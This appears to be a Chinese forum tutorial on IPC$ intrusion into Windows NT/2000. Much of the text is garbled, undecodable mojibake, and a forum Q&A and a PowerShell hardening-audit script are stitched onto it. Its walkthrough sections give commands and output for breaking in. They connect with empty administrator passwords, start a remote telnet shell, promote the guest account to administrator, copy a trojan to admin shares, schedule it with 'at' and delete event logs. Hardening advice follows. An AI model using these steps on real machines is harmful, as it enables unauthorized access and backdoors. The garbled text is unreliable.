ipc$ϸʹȫ
I. Preface

Ϲipc$ֵ¿νţëҲ֮˵ѾΪģʽҲûԸٰѾΪʽĶóŪ 
˵ҸΪЩ½ĲϸڵһνӴipc$Ĳ˵򵥵в貢ܽǵԻһhack̳һipc$ڵɻж٣ҲοϵһЩϣ̳Լ̳ӣдƪܽʵ£һЩ׻Ի˵˵ôҲҪǻԭ! 
ע⣺۵ĸĬϷwin NT/2000£win98ڴ˴֮Уwin XpڰȫߣãлὫۡ 


II. What is ipc$


IPC$ (Internet Process Connection) is the shared "named pipe" resource: a named pipe opened so that processes can communicate. By supplying a trusted user name and password, the two sides can establish a secure channel and exchange encrypted data over it, which is how access to the remote computer is obtained. IPC$ is a new feature of NT/2000, and it has one particular property: at any one time only one connection is allowed between a given pair of IPs. Besides providing ipc$, NT/2000 also enables the default shares at initial installation, namely all logical drive shares (c$, d$, e$, ...) and the system directory winnt or windows (admin$). Microsoft's intent with all of this was to make administration easier, but intentionally or not it lowered system security.
We often hear people talk about the "ipc$ vulnerability". In fact ipc$ is not a vulnerability in the strict sense; when people call it that they must mean the "back door" Microsoft itself installed: the null session. So what is a null session?


III. What is a null session


Before introducing null sessions, it is worth understanding how a secure session is established.
Windows NT 4.0 uses a challenge/response protocol to establish a session with a remote machine. A successfully established session becomes a secure tunnel through which both sides exchange information. Roughly, the process is:
1) The session requester (client) sends a packet to the session receiver (server) requesting that a secure tunnel be established;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes this server-generated 64-bit number, scrambles it with the password of the account it is trying to establish the session with, and returns the result to the server (the response);
4) On receiving the response the server hands it to the Local Security Authority (LSA). The LSA verifies the response using the user's correct password to confirm the requester's identity. If the requester's account is a local account on the server, verification happens locally; if it is a domain account, the response is forwarded to a domain controller for verification. Once the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.
That is roughly how a secure session is established. What about a null session?

A null session is a session established with the server without trust, that is, without a user name or password being supplied. Under the WIN2000 access control model a null session still has to be given a token, but because no user information was authenticated while it was established, the token contains no user information. As a result the session cannot be used to exchange encrypted information between systems. That does not mean the null session's token contains no security identifier (the SID, which identifies a user and the groups it belongs to): for a null session the LSA supplies a token whose SID is S-1-5-7, and the user name is ANONYMOUS LOGON (this user name appears in user listings but cannot be found in the SAM database; it is a built-in system account). The access token contains the following impersonated groups:
Everyone 
Network 
Within the limits of the security policy, the null session is therefore granted access to everything those two groups are allowed to access. So what can you actually do with a null session?


IV. What a null session can do


On NT under the default security settings, a null connection can be used to enumerate the users and shares on the target, access shares that grant the everyone group permissions, read a small part of the registry, and so on; none of that is worth much. It is worth even less on 2000, because from Windows 2000 onward only administrators and backup operators may access the registry over the network by default, and doing so is inconvenient and requires tools. From this we can see that such an untrusted session is of little use on its own. But seen as part of a complete ipc$ intrusion, the null session is an indispensable stepping stone, because it yields the user list, and for a real hacker that is already enough. So which commands can a null session use?


1 First, establish a null session (this requires the target to have ipc$ open):
net use \\ip\ipc$ "" /user:"" 
Note: the command above contains four spaces: one between net and use, one after use, and one on each side of the password.


2 View the remote host's shared resources
net view \\IP 
ͣ˿ӺôԲ鿴ԶĹԴ˹Եõƽ 
 \\*.*.*.*ĹԴ 
Դ  ; ע 

----------------------------------------------------------- 
NETLOGON Disk Logon server share 
SYSVOL Disk Logon server share 
ɹɡ 


3 View the remote host's current time
net time \\IP 
ͣôԵõһԶĵǰʱ䡣 


4 Get the remote host's NetBIOS name table (this requires NBT to be enabled on your own machine)
nbtstat -A IP 
ôԵõһԶNetBIOSûбҪnetbios֧֣½ 

Node IpAddress: [*.*.*.*] Scope Id: [] 

NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
SERVER <00> UNIQUE Registered 
OYAMANISHI-H <00> GROUP Registered 
OYAMANISHI-H <1C> GROUP Registered 
SERVER <20> UNIQUE Registered 
OYAMANISHI-H <1B> UNIQUE Registered 
OYAMANISHI-H <1E> GROUP Registered 
SERVER <03> UNIQUE Registered 
OYAMANISHI-H <1D> UNIQUE Registered 
..__MSBROWSE__.<01> GROUP Registered 
INet~Services <1C> GROUP Registered 
IS~SERVER......<00> UNIQUE Registered 

MAC Address = 00-50-8B-9A-2D-37 

That is what a null session can be used for; it does not gain much, but one point deserves attention: ipc$ connection operations are written to the EventLog, whether or not the logon succeeds. Now, which ports does ipc$ use?


V. Ports used by ipc$


First, some background:
1 SMB (Server Message Block): the Windows protocol family that provides file and print sharing services.
2 NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to carry NetBIOS networking over TCP/IP.
3 In Windows NT, SMB runs over NBT. In Windows 2000, SMB can run over NBT or directly over port 445.

With this background we can look at which ports a share connection picks:

From the win2000 client's side:
1 If NBT is enabled, the client tries to connect to both port 139 and port 445 at the same time. If port 445 responds, it sends RST to port 139 to drop that connection and continues the session on port 445; only if port 445 does not respond does it use port 139. If neither port responds, the session fails;
2 If NBT is disabled, the client only tries port 445; if port 445 does not respond, the session fails. It follows that with NBT disabled, win 2000 can no longer connect to win NT shares.


From the win2000 server's side:
1 If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open;
2 If NBT is disabled, only port 445 is open.


The same rules govern which port an ipc$ session uses. Clearly, if the remote server is not listening on port 139 or 445, no ipc$ session can be established.


VI. The role of ipc$ in hacking


˵ģʹ㽨һյӣҲԻòٵϢЩϢбزٵģܹĳһһȨ޵ûݵ½ĻôͻõӦȨޣȻԹԱݵ½,ٺ,ɾ˲ˣϿΪΪˡҲҪ˵̫磬ΪԱ벻ôø㵽ģȻһЩĵĹԱϾڲȴǰˣǰȫʶߣԱҲСˣõԱ뽫ԽԽѵģ˽ĿܾԼСȨûȨ޽ӣipc$ʱ޷ӣķipc$ӲܵģԲҪÿӶܳɹǲʵġ 
ǲЩģҲ,ؼҪ̬Ҫipc$ֵռҪΪս޲ʤ,ֻǺַܶеһ֣пһɱҲпһЩģںڿ͵ÿ·ͨһ·ͨĵѰҰɣ 


VII. Common reasons an ipc$ connection fails

һЩĵipc$ʧܵԭ 


1 IPCWindows NTϵͳеĹܣҪõWindows NTкܶDLLԲWindows 9.x/MeϵͳУҲ˵ֻnt/2000/xpſ໥ipc$ӣ98/meǲܽipc$ӵģ 


2 ɹĽһipc$ӣҪԷipc$ʹǿҲԷرipc$㽫Ὠʧܣ 


3 δLanmanworkstationṩͨѶû޷ʾΪWorkstation 


4 ԷδLanmanserverṩ RPC ֧֡ļӡԼܵipc$ڴ˷ûԶ޷ӦʾΪServer 


5 ԷδNetLogon֧ϼ pass-through ʻ¼ݣ 


6 ԷֹNBTδ139˿ڣ 


7 Էǽ139445˿ڣ 


8 ûȻջỰųִ󣩣 


9 󣺿ܶ˻˿ո񣬵ûвոʱߵ˫ſʡԣΪգֱ""ɣ 


10 Ѿӵ¶Էôipc$ӽԶϿҪ½ӡ 


The error number returned also points at the cause:
Error 5, access denied: the account used most likely does not have administrator rights;
Error 51, Windows cannot find the network path: a network problem;
Error 53, the network path was not found: wrong IP address; target powered off; the target's lanmanserver service is not started; the target has a firewall (port filtering);
Error 67, the network name cannot be found: your lanmanworkstation service is not started; the target has removed ipc$;
Error 1219, the credentials supplied conflict with an existing set of credentials: you already have an ipc$ connection to the target; delete it and reconnect;
Error 1326, unknown user name or bad password: self-explanatory;
Error 1792, an attempt was made to log on but the network logon service was not started: the target's NetLogon service is not started;
Error 2242, the password of this user has expired: the target has an account policy that forces periodic password changes.


VIII. Reasons copying files fails


ЩȻɹĽipc$ӣcopyʱȴ鷳޷Ƴɹô¸ʧܵĳԭЩأ


 

 

1 äĿ 
ֵ࣬ռ50%ϡ֪ԷǷйļУͽäĿƣ¸ʧܶƵĺܡҽڽи֮ǰnet view \\IPһ¶ԷĹҪΪipc$ӽɹ˾һйļС 

2 ĬϹжϴ 
ҲǴҾģҪС棺 

1Ϊܽipc$ӵһĬϹڽ֮admin$֮ĬϹļ¸ʧܡipc$ӳɹֻ˵Էipc$ipc$ĬϹ£ipc$һܵĸʵʵļУĬϹipc$ıҪ 

2net view \\IP ޷ʾĬϹΪĬϹ$ͨǲж϶ԷǷĬϹԷδĬϹôĬϹеĲܳɹ󲿷ɨɨͬʱɨĬϹĿ¼Աķ 

3ûȨ޲Σ 
1йĬϹͨʱȨǲģ 
2ĬϹʱҪйԱȨޣ 
3ͨʱҪӦȨޣԷ趨ķȨޣ 
4Էͨǽȫãֹⲿʹ 

Ҫ˵һ㣺ҪΪadministratorһǹԱԱǿԸĵġ 


4ǽɱھ 
ҲĸƲѾɹԶʱǽɱˣҲļпľƵ˾ڵʧܡ˽㸴ʱҪСģǰˡ 


ǺǣҲ֪ipc$ʵʲлǧٹֵ⣬ֻܽһЩû˵ģֻôԼȥˡ 


IX. How to open the target's IPC$ and other shares


Ŀipc$׾ܴ򿪵ģҪ´ˡҪһadminȨ޵shell,telnet,ľȣȻshellִnet share ipc$Ŀipc$net share ipc$ /delرչҪļУnet share baby=c:\Ͱc̿ΪΪbabyˡ 


X. Some commands that require a shell


̳ܶⷽдʮֲ׼ȷһЩҪshellͼ򵥵ipc$ִˣáôܽһҪshellɵ 

1 Զûû޸û룬ĲҪshellɣ 

2 Զipc$ĬϹͨĲҪshellɣ 

3 /رԶķҪshellɣ 

4 /ɱԶḶ̌ҲҪshellɡ 


XI. Commands that may be needed


עڱػԶ̣ڱأֻڻԶshell󣬲ԶִС 

1 : 
net use \\192.168.1.105\ipc$ "abc" /user:"abc" 

2 ǿ: 
net use \\192.168.1.105\ipc$ "abc" /user:"abc" 

3 鿴ԶĹԴĬϹ 
net view \\192.168.1.105 

4 鿴ĹԴԿصĬϹ 
net share 

5 õԶûб 
nbtstat -A IP 

6 õûб 
net user 

7 鿴Զĵǰʱ 
net time \\IP 

8 ʾǰ 
net start 

9 /رձط 
net start  /y 
net stop  /y 

10 ӳԶ̹: 
net use z: \\IP\baby 
ΪbabyĹԴӳ䵽z 

11 ɾӳ 
net use c: /del ɾӳc̣ 
net use 192.168.1.105 /del /yɾȫ 

12 Զļ 
copy \D:\Զ\Զ\Զ.exe \\192.168.1.105\磺 
copy ccbirds.exe \\*.*.*.*\c ǰĿ¼µļƵԷc 

13 ԶӼƻ 
at \\ip ʱ 磺 
at \\127.0.0.0 11:00 love.exe 
ע⣺ʱ価ʹ24СʱƣϵͳĬ·system32/²ü·ȫ· 


14 Զtelnet 
ҪõһСopentelnet.exeվ㶼УһҪĸҪ 

1Ŀ꿪ipc$ 
2ҪӵйԱʺ 
3Ŀ꿪RemoteRegistryû͸ntlm֤ 
4WIN2K/XPЧNTδ 
ʽOpenTelnet.exe \\server account psw NTLM֤ʽ port 
£c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90 

15 û/Ա 
1 net user account /active:yes 
2 net localgroup administrators abc /add 

16 رԶtelnet 
ͬҪһСResumeTelnet.exe 
ʽResumeTelnet.exe \\server account psw 
£c:\>ResumeTelnet.exe \\*.*.*.* administrator "" 

17 ɾһѽipc$ 
net use \\IP\ipc$ /del 


̳̲ڸ£°汾½ٷվ˲ԭhttp://ccbirds.yeah.net 


XII. An ipc$ intrusion example

ʵֲ˰ͬҾ˵һ³İɣǺǣ׳ˣ 

1 ɨѰ⣬SSSX-scanȣı㣬ȻĿ꣬ɨ˹ԱȨ޵ĿԽĲˣڵõadministratorΪ 


2 ʱ·ѡҪôԷtelnetУ,Ҫôľͼν棩Ǿtelnet· 


3濪telnetûɣҪõopentelnetС 
OpenTelnet.exe \\192.168.1.105 administrator "" 1 90 
Ϣ 
******************************************************* 
Remote Telnet Configure, by refdom 
Email: refdom@263.net 
OpenTelnet.exe 

UsagepenTelnet.exe \\server username password NTLMAuthor telnetport 
******************************************************* 
Connecting \\192.168.21.*...Successfully! 

NOTICE!!!!!! 
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23 

Starting telnet service... 
telnet service is started successfully! telnet service is running! 

BINGLE!!!Yeah!! 
Telnet Port is 90. You can try:"telnet ip 90", to connect the server! 
Disconnecting server...Successfully! 
*˵Ѿһ˿90telnet 


4 telnetȥ 
telnet 192.168.1.105 90 
ɹ㽫Զһshell,ʱԼĻһ⼦ˣôʲôأguestټɣ 


5 C:\>net user guest /active:yes 
*GuestûҲп˼ҵguestԻģnet user guestһʻõֵyesno 


6 C:\>net user guest 1234 
*GuestΪ1234,߸ĳϲ 


7 C:\>net localgroup administrators guest /add 
*GuestΪAdministratorʹԺԱ룬Ҳguest¼ˣҲҪΪͨȫԵãԽֹguestʻԶ̷ʣǺǣǵĺҲͰˣԸϵ۱Guest 


8 ˣһ·ľ 


9 ȣȽipc$ 
C:\>net use \\192.168.1.105\ipc$ "" /user:administrator 


10 ȻҪϴҪ֪ʲô 
C:\>net view \\192.168.1.105
 \\192.168.21.*ĹԴ 
Դ  ; ע 

----------------------------------------------------------- 
C Disk 
D Disk 
ɹɡ 
*ˣǿԷC,ḌͿһ̸ļˡٴΪnet view޷ĬϹͨ淵صĽǲж϶ԷǷĬϹ 


11 C:\>copy D:\Զ\Զ\Զ.exe \\192.168.1.105\c 
Ѹ 1 ļ 
*Խľͻlove.exeԷc£ȻܸƵϵͳļõˣױ 


12 ľǰȿڵʱ 
net time \\192.168.21.* 
\\192.168.21.*ĵǰʱ 2003/8/22  11:00 
ɹ 


13 atɣԷһҪTask SchedulerָʱУͲ 
C:\>at \\192.168.21.* 11:02 c:\love.exe 
¼һҵҵ ID = 1 


14 ʣ¾ǵˣȹ11:02Ϳÿƶȥˣɹ㽫ͼνȥԶˣʧܣôھҲܳ򱻷ǽɱˣˣûôɰɣֻ÷ 


ţˣֻˡĲѾᳵ·ˣҲøЧ·CA¡guestp***ecִľp***ec \\tergetIP -u user -p paswd cmd.exeֱӻshellȣЩǿԵãı㡣Ҫ˰־ɾŸelsave.exe 
ipc$֣Ͳܲ˵ηôҪأ


 

 

XIII. How to defend against ipc$ intrusion


1 Prevent null connections from enumerating (this does not stop the null connection itself from being established)

1) First method:
Run regedit, find [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] and set the DWORD value RestrictAnonymous to 1
With the value 1, an anonymous user can still connect to the IPC$ share but cannot use that connection to enumerate SAM accounts and share information. Windows 2000 added the value 2, which restricts all anonymous access unless explicitly granted; setting 2 can cause problems, so 1 is recommended. If the value does not exist, create it and then set it.

2) Second method:
In Local Security Settings, Local Policies, Security Options, configure 'Additional restrictions for anonymous connections' accordingly.


2 Disable the default shares

1) View local shared resources
Run - cmd - enter net share

2) Delete the shares (this has to be repeated after every boot)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (continue with e, f, ...)

3) Stop the Server service
net stop server /y (the Server service starts again after a reboot)

4) Stop the default shares from being created automatically (this does not close the ipc$ share)
Run - regedit

Server edition: find [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareServer to 00000000

Professional edition: find [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareWks to 00000000
If the value does not exist, create it (right-click - New - DWORD value) and then set it. This value does not exist by default and has to be added by hand.


3 Stop the service that ipc$ and the default shares depend on: the Server service
Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - Disabled. You may be warned that service XXX will also be stopped and asked whether to continue, because some minor services depend on lanmanserver; ignore it.


4 Block ports 139 and 445
Without these two ports ipc$ cannot be established, so blocking ports 139 and 445 also stops ipc$ intrusion.

1) Port 139 can be blocked by disabling NBT
Local Area Connection - TCP/IP properties - Advanced - WINS - select 'Disable NetBIOS over TCP/IP'

2) Port 445 can be blocked through the registry
Add a value:
Hive: HKEY_LOCAL_MACHINE 
Key: System\Controlset\Services\NetBT\Parameters 
Name: SMBDeviceEnabled 
Type: REG_DWORD 
Value: 0 
Reboot after the change

Note: once these two ports are blocked, you can no longer make ipc$ connections to other machines either.


3) Install a firewall and filter the ports


5 Set a complex password to prevent password brute-forcing over ipc$.
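The following read-only audit script is an added example, not part of the original article: it checks the registry values the defence section lists (RestrictAnonymous, AutoShareServer/AutoShareWks, SMBDeviceEnabled), reports which administrative shares are still exposed, and shows the state of the Server service. It assumes a modern PowerShell with the SmbShare module (Windows 8 / Server 2012 or later); on older systems replace Get-SmbShare with the output of net share.

```powershell
# Added example: audit the ipc$ hardening settings described above. Changes nothing.
# Run from an elevated PowerShell prompt on the host being checked.
$checks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'RestrictAnonymous'; Want = 1
       Note = 'null-session enumeration of SAM accounts and shares' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'AutoShareServer'; Want = 0
       Note = 'automatic C$/D$/ADMIN$ shares (server editions)' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'AutoShareWks'; Want = 0
       Note = 'automatic C$/D$/ADMIN$ shares (workstation editions)' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'
       Name = 'SMBDeviceEnabled'; Want = 0
       Note = 'SMB directly over TCP/445' }
)

foreach ($c in $checks) {
    # A missing value is reported explicitly: the article notes that several of these
    # do not exist by default and must be created before they can be set.
    $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        $state = 'NOT SET (default behaviour applies)'
    } elseif ($item.($c.Name) -eq $c.Want) {
        $state = "OK ($($item.($c.Name)))"
    } else {
        $state = "WEAK ($($item.($c.Name)), recommended $($c.Want))"
    }
    '{0,-18} {1,-40} {2}' -f $c.Name, $state, $c.Note
}

# Administrative shares currently exposed (what 'net share' lists): any share ending
# in '$' other than IPC$ is a drive or system-directory share reachable over an
# authenticated ipc$ session. Get-SmbShare is assumed to be available.
$admin = Get-SmbShare -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -like '*$' -and $_.Name -ne 'IPC$' }
if ($admin) {
    'Admin shares present: ' + ($admin.Name -join ', ')
} else {
    'No drive/admin$ shares exposed.'
}

# Disabling the Server (LanmanServer) service, as the article describes, removes
# ipc$ and the default shares entirely; show whether it is running.
$svc = Get-Service -Name LanmanServer -ErrorAction SilentlyContinue
'LanmanServer service: ' + $(if ($svc) { $svc.Status } else { 'not found' })
```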


XIV. Selected ipc$ Q&A


˵һѵ۶ʵָ⣬Ϊ˸İҿüȫ̳nӣһЩдԵʴеһЩҸģһЩ̳ϵĻظʲô©ʹ󣬻 


1.ipc$ֵʱ򣬻ڷ¼¼ʲô취Բ÷ 

¼¼һģߺóɾͿˣ⼦֡ 


2.㿴Ϊʲôӵܸ 
net use \\***.***.***.***\ipc$ "" /user:"û" 
ɹ 
copy icmd.exe \\***.***.***.***\admin$ 
Ҳ· 
ɹ 

𣺿ԭ 
1Ȩ޲ܷĬϹ 

2Էûпadmin$ĬϹҪΪܽipc$ӣԷһĬϹܶ˶ôΪʱԱĬϹͨc$,d$,c,dȣǲУҪȨˣǹԱȨޣԿtelnet,ܳɹڸҲС 


3.ԷIPC$ܽӣCDʱҪ룬֪ǿû̫Ȩޣ
nbtstat -a 192.168.1.103
net use \\IP\ipc$ "" /user:""
net use \\192.168.1.104\ipc$ "" /user:"abc"
net use h: \\192.168.1.105\c$ 
net use \\192.168.1.104\ipc$ "" /user:"administrator" IPC 
net use \\192.168.1.103\ipc$ "abc" /user:"abc" IPCǿ 
net use h: \\192.168.1.105\c$ "abc" /user:"abc" 
ֱӵ½ӳԷCΪH: 
net use h: \\192.168.1.105\c$ "" /user:"administrator" 
telnet 192.168.1.105
NET START 192.168.1.105 TELNET
net use h: \\192.168.1.105\d$ ½ӳԷCΪH: 
net use \\192.168.1.103\ipc$ /del ɾIPC 
net use h: /del ɾӳԷصΪH:ӳ 
net user û롡/add û 
net user guest /active:yes guestû 
net user 鿴Щû 
net user ʻ 鿴ʻ 
mstsc /v: 192.168.1.105:8081 /console
net localgroup administrators û /add "û"ӵԱʹйԱȨ,ע⣺administratorsø 
net start 鿴Щ 
net start  (:net start \\192.168.1.105\c$ net start schedule) 
net stop  ֹͣĳ 
net time \\Ŀip 鿴Էʱ 
net user \\192.168.1.105 abc /active:yes 
net time \\Ŀip /set ñؼʱ"ĿIP"ʱͬ,ϲ/yesȡȷϢ 
net view 鿴ؾڿЩ 
net view \\ip 鿴ԷڿЩ 
net config ʾϵͳ 
net logoff ϿӵĹ 
net pause  ͣĳ 
net send ip "ıϢ" ԷϢ 
net ver ʹõͺϢ 
net share 鿴ؿĹ 
net share \\192.168.1.105\ipc$ ipc$ 
net share ipc$ /del ɾipc$ 
net share c$ /del ɾC 
net user guest 12345 guestû½ýΪ12345 
net password  ϵͳ½ 
netstat -a 鿴Щ˿,netstat -an 
netstat -n 鿴˿ڵnetstat -an 
netstat -v 鿴ڽеĹ 
netstat -p Э netstat -p tcq/ip 鿴ĳЭʹ鿴tcp/ipЭʹ 
netstat -s 鿴ʹõЭʹ 
nbtstat -A ip Է136139һ˿ڿ˵ĻͿɲ鿴Է½û03ǰΪû-ע⣺-AҪд 
tracert - ip() ·ɣݰ"-w"óʱ 
ping 192.168.1.105() ԷĬϴСΪ32ֽڵݣ"-l[ո]ݰС""-nݴ""-t"ָһֱping 
ping -t -l 65550 ip ֮ping(ʹ64Kļһֱpingͳ֮ping) 
ipconfig (winipcfg) windows NTXP(windows 95 98)鿴ipַipconfigò"/all"ʾȫϢ 
tlist -t бʾ(ΪϵͳĸӹߣĬûаװģڰװĿ¼Support/toolsļ) 
kill -F  -Fǿƽĳ(ΪϵͳĸӹߣĬûаװģڰװĿ¼Support/toolsļ) 
del -F ļ -FͿɾֻļ,/AR/AH/AS/AAֱʾɾֻءϵͳ浵ļ/A-R/A-H/A-S/A-Aʾɾֻءϵͳ浵ļ"DEL/AR *.*"ʾɾǰĿ¼ֻļ"DEL/A-S *.*"ʾɾǰĿ¼³ϵͳļļ

ҪԶIPC$ӱ߱1гܵ룻2Զ̻Severһ㶼ˣǸ֪һ㣻3˽Net Use֮X-scanɨһЩipc©߳ΪյġõIP 192.168.0.1.Pingһ£ȷߡȻWindowsµDos£cmd)룺
net use \\116.115.20.29\ipc$ "" /user:"adminstrator"
гɹͨעԶӣڵһ˵иԶ̸ķעҲ԰⼦ĹӰ䵽ҵĵԡ
net use t: \\192.168.1.103\c$
ɺͿҵĵ￴z̷Զ̻c̡shanlu֣WINNTAutoAttack.exeIPC$1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"""ɨûadministratorsΪ""IPַ(õǴ㹥ĻͿ127.0.0.1һӣΪΪ""ԵһŴͲ룬һ˫ûadministratorsɳɹɡ2. C:\>copy srv.exe \\127.0.0.1\admin$ȸsrv.exeȥToolsĿ¼¾У$ָadminûc:\winnt\system32\һʹc$d$˼CḌ⿴ҪƵʲôطȥˣ3. C:\>net time \\127.0.0.1ʱ䣬127.0.0.1 ĵǰʱ 2002/3/19  11:00ɹɡ4. C:\>at \\127.0.0.1 11:05 srv.exeatsrv.exeɣõʱҪʱ죬Ȼô.5. C:\>net time \\127.0.0.1ٲ鵽ʱûУ127.0.0.1 ĵǰʱ 2002/3/19  11:05Ǿ׼ʼ6. C:\>telnet 127.0.0.1 99õTelnetɣע˿99TelnetĬϵ23˿ڣʹõSRVڶԷΪǽһ99˿ڵShellȻǿTelnetȥˣSRVһԵģ´ε¼ҪټǴ㽨һTelnetҪõntlm7.C:\>copy ntlm.exe \\127.0.0.1\admin$Copyntlm.exeϴϣntlm.exeҲڡ⡷ToolsĿ¼У8. C:\WINNT\system32>ntlmntlmC:\WINNT\system32>ָǶԷntlmʵڶԷУ"DONE"ʱ򣬾˵ѾȻʹ"net start telnet"Telnet9. Telnet 127.0.0.1ûͽԷˣDOSϲһ򵥣(Ȼʲô?ʲôʲô,)ΪԷһ,ٰguestӵ10. C:\>net user guest /active:yesԷGuestû11. C:\>net user guest 1234GuestΪ1234,Ҫ趨12. C:\>net localgroup administrators guest /addGuestΪAdministrator^_^(ԱģguestʺûıĻ´ǿguestٴη̨һ̨ôܷһ̨ԴʲôԶЭ
ͷ֣0 - ʱ䣺2006-3-28 20:30
ߣ wxy5174 -  һ
Ѵ
ںڿڶֶУͨIPC$ֳΪĿǰȽϳһַʽ乥˵ѾΪģʽѷǳô¡֪֪ˣܰսֿǣ˽һַʽĻ֪ʶ
IPCInternet Process ConnectionдҲԶӡWindows NT/2000/XPеһܣ֮佨ͨӡһЩͨų֮ͨſԽIPC档ȷIPCӾںõĵصͨصԶĬ£IPCǹģҲ˵΢ѾΪںصIPCˣֻIPCҲΪIPC֡
IPC$ǹ˼صĹ΢ϵͳá$ʾصĹC$صĹC̡Ҳ˵CǹģCûǸ֡־IPC$ǹܵԴΪý̼ͨŶŵ֤ܵͨûӦȨޣԶ̹Ͳ鿴ĹԴʱʹáIPC$ĿһյӶû룡ȻԷIPC$Ӳϵġյӣ߻ԵõĿϵûб
ʣIPCҪʲô
𣺽IPCҪ˫ǻNTܹϵͳWindows Me/98/95ԡ
ʣôܽIPCأҪʲôڿ͹أ
𣺽IPCӲҪκκڿ͹ߣWindowsоˣҪ֪Զû롣CMDnet use\\ip\ipc$ "password" /user:"username"ӡע⣬Զ̷ûм139445˿ڣỰ޷ġҲ˵IPC$ҪԷ139445˿ڡ
ʣIPC$֮ڿʲô
ڿʹùԱȨ޵˺źĿIPC$ͿԺͶԷϵͳ롰ˡڿͿʹøзʽĹߣpstoolsϵСWin2000SrvReskittelnethackȻĿϢĿĽ̺ͷȡĿ꿪ĬϹûĻڿͻ㿪ڿ;ͿϴľУҲtftpftpİ취ϴdwrccVNCRemoteAdminȹߣľֱӿĹܣֱӿǡWin2000 serverڿͻῼǿն˷Էơ
ʣ޷ԼIPC$ǷζҾͲܺͶԷIPC$أ
𣺲ǵģIPC$ͱIPC$ͬĸ޷ԼIPC$ӰԼǷܹ˽IPC$
ʣ˵иӣôأ
𣺼˵ӼҪûͿԽIPCӣǵòʲôȨ޵ġӵnet use \\IP\ipc$ "" /user:""ûεĻỰδṩû룩Win2000ķʿģͣջỰĽͬҪṩһƣǿջỰڽвûоûϢ֤вûϢˣỰ޷ϵͳ䷢ͼϢⲢʾջỰвȫʶSIDʶû飩һջỰLSAṩƵSIDS-1-5-7ǿջỰSIDûǣANONYMOUS LOGONûǿûбпģ޷SAMݿҵϵͳõ˺ţưαװ飺EveryoneNetworkڰȫԵ£ջỰȨʵȨʵһϢ
ʣʲôã
𣺶NTĬϰȫ£ӿоĿϵû͹EveryoneȨ޵ĹСעȣûʲô̫üֵWin2000øСΪWin2000Ժ汾ĬֻйԱͱݲԱȨʵעʵҲ㣬ߡЩǿԿַλỰûжôһIPC$һȱٵ壬ΪǴԵõûбӻоû飬Ŀϵͳ͵ȡһĺڿѾ㹻ˡ
ʣÿӵõԶûб
ȣȽһջỰҪĿ꿪ipc$net use \\ip\ipc$ "" /user:""ɽӡȻnet view \\IP鿴ԶĹԴԷ˹Ϳгͼע͡ʹnbtstat -A IPͿԵõԶNetBIOSûбҪԼNBTע⣬IPC$ӵĲEventLog¼¼Ƿ¼ɹ
ʣӺIPC$һ
ӺIPC$ǲͬĸûεĻỰ仰˵һʡIPC$Ϊý̼ͨŶŵ֤ܵͨûӦȨޡIPC$ӿʵԶ̵½ĬϹķʡ
ʣIPC$Ǹ©
жᵽIPC$©ʵIPC$ϵ©Ϊ˷ԱԶ̹ŵԶ½ܣһĬϹе߼(c$,d$,e$)ϵͳĿ¼winntwindows(admin$)еЩԶΪ˷ԱĹһЩ߻IPC$ʹԴûбʹֵ乤߽̽⣬ϣڻøߵȨޣӶﵽɸ˵ĿġǶ˵IPC$ڿá
ʣIPC$ӳɹnet uset kkk /addһ˻ȴ˻ԼĻϣô£
IPC$ɹֻ˵Զͨζȡһshellֻڻһshell֮Զ̽һ˻ĲֻڱؽС
ʣҽipc$ӵʱ򷵻ϢṩƾѴڵƾݼͻô£
˵ĿһϵIPC$ӣǲģɾɡnet use \\*.*.*.*\ipc$ /del
ʣIPC$ĬϹʲôϵ
ĬϹΪ˷ԱԶ̹ĬϿĹе߼(c$,d$,e$)ϵͳĿ¼winntwindows(admin$)ͨipc$ӿʵֶЩĬϹķʣǰǶԷûйرЩĬϹ
ʣֻҪԷ139˿ڻ445˿ھͿԽIPC$
뷨һȷ139445˿ڿδؿԽIPC$IPC$ɽʾԷ139˿ڻ445˿ڿˡ
ʣӳͷĬϹ
ʹnet use z: \\ĿIP\c$ "" /user:"û"ԷcӳΪԼẓơ
ѾĿ꽨IPC$ֱIP̷$ʡִcopy muma.exe \\IP\d$\path\muma.exeӳҲԣֻûˣ룺net use y: \\IP\d$Ȼִcopy muma.exe y:\path\muma.exeɡ·аոʱ""·ȫס
ʣɾӳipc$ӣ
net use \\IP\ipc$ /delɾһĿIPC$ӡnet use z: /delɾӳẒơnet use * /delɾȫɾʱʾҪ󰴡yȷϡ
ʣηIPC$֣
Ҫֹӽö(˲ֹӵĽ)regeditҵHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSAµDWORDֵRestrictAnonymousļֵΪ00000001
Ȼnet share쿴عԴɾ
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /deletee,f̷ͬɾ
ü±༭ݵעļΪֵ.Regļʹʱ˫ɹرĬϹIPC$
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
